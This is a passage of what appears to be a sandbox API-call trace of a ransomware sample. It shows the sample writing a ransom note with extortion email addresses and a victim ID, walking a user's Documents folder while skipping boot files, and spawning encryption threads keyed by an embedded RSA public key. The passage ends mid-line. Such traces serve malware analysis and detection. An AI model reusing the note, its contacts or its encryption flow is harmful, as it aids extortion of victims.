informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0175.194] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0175.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa74 [0175.195] CloseHandle (hObject=0xa74) returned 1 [0175.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0175.195] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0175.195] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0175.195] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0175.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.195] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2="..") returned 1 [0175.195] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2=".") returned 1 [0175.195] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0175.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0175.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0175.196] SetErrorMode (uMode=0x1) returned 0x1 [0175.196] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0175.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.196] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0175.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0175.196] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0175.196] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0175.196] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.196] lstrcmpW (lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpString2="..") returned 1 [0175.196] lstrcmpW (lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpString2=".") returned 1 [0175.196] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.196] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntldr") returned 0x0 [0175.196] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTLDR") returned 0x0 [0175.196] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.196] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.196] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.196] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.196] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.196] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0175.196] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa7c [0175.197] Sleep (dwMilliseconds=0x96) [0175.349] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.349] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2="..") returned 1 [0175.350] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2=".") returned 1 [0175.350] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.350] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntldr") returned 0x0 [0175.350] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTLDR") returned 0x0 [0175.350] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.350] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.350] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.350] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.350] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.350] lstrcpyW (in: lpString1=0x17be7c, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0175.350] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa80 [0175.351] Sleep (dwMilliseconds=0x96) [0175.505] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.505] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2="..") returned 1 [0175.505] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2=".") returned 1 [0175.505] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.505] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntldr") returned 0x0 [0175.505] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTLDR") returned 0x0 [0175.506] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.506] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.506] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.506] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.506] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.506] lstrcpyW (in: lpString1=0x17be7c, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0175.506] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa84 [0175.506] Sleep (dwMilliseconds=0x96) [0175.661] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.661] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2="..") returned 1 [0175.661] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2=".") returned 1 [0175.661] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.662] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntldr") returned 0x0 [0175.662] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTLDR") returned 0x0 [0175.662] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.662] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.662] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.662] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.662] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.662] lstrcpyW (in: lpString1=0x17be7c, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0175.662] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa88 [0175.663] Sleep (dwMilliseconds=0x96) [0175.817] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.817] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2="..") returned 1 [0175.817] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2=".") returned 1 [0175.818] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.818] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntldr") returned 0x0 [0175.818] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTLDR") returned 0x0 [0175.818] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.818] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.818] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.818] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.818] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.818] lstrcpyW (in: lpString1=0x17be7c, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0175.818] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.818] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa8c [0175.819] Sleep (dwMilliseconds=0x96) [0175.973] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0175.973] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2="..") returned 1 [0175.973] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2=".") returned 1 [0175.973] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.973] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntldr") returned 0x0 [0175.973] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTLDR") returned 0x0 [0175.973] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.973] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.974] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0175.974] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0175.974] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 